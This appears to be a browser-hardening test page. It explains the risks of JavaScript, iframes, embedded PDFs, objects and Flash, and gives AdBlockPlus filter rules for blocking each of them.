Exploitable Web Content Blocking Test


JavaScript

Although it is the main client-side scripting language of the internet, JavaScript opens up a lot of potential attack vectors.

JavaScript can easily be blocked by default in your browser settings, and then whitelisted on a per-site basis. This allows you to maintain full web functionality as well as the security of having it disabled by default.

AdBlockPlus blocks external scripts by default, however it is not possible to block all inline scripts. You must use your browser settings for this.

The main reason for blocking JavaScript is to protect against compromised/malicious websites. Many websites have cross-site scripting (XSS) vulnerabilities that allow potentially malicious JavaScript to be inserted into a page by anybody, often by using a badly designed comment form.


iFrames

iFrames allow an external document to be loaded within a frame on a webpage. This means that potentially malicious content could be loaded in the background without your knowledge, even though your URL bar displays a trusted site.

They are also used in Clickjacking attacks, which is where an invisible iFrame is loaded ontop of the page content. As you click around the site, you are also secretly clicking on the site that is loaded in the invisible iFrame. This could be a malware site, spam site or even the password reset form for one of your online accounts.

In order to block iFrames with AdBlockPlus, add the following to your filters:

*$subdocument,domain=~whitelisted.tld|~two.tld|~three.tld

You can whitelist as many domains as you like using the method above.


PDFs

Exploits relating to PDF files are generally due to vulnerabilities in PDF readers, not PDF files themselves.

The most well known PDF reader, Adobe Reader, has many vulnerabilities and is the main target for PDF-borne malware. The Google Docs PDF viewer is a good alternative, since it will parse the PDF file and display it as HTML, so any malicious payloads should not get through.

In order to block PDFs with AdBlockPlus, add the following to your filters:

*.pdf

This will only block embedded PDF documents. Direct links or downloadable PDF documents will not be blocked.


Objects

Objects are another form of subdocument or embedded content, so there is a lot of crossover when it comes to blocking them.

HTML documents displayed within objects are very similar to iFrames, so they are blocked by the same filter. Multimedia content such as PDFs or Flash that are displayed within an object are also blocked by their corresponding filters. However, you should still block all objects, just to be safe!

In order to block objects with AdBlockPlus, add the following to your filters:

*$object

Flash

Don't worry, this isn't a real Flash file! It's just a text file containing one single character, with the file extension ".swf".

If you have Flash disabled in your browser (most modern browsers do this by default), you will still see the "Right-click to run Adobe Flash Player" dialogue. Your browser has a higher priority than your ad blocker when it comes to stopping Flash from running. If Flash is accidentally enabled in your browser settings, your ad block can act as a second line of defense.

In order to block .swf files with AdBlockPlus, add the following to your filters:

*.swf

This will only block embedded Flash files. Direct links or downloadable Flash files will not be blocked.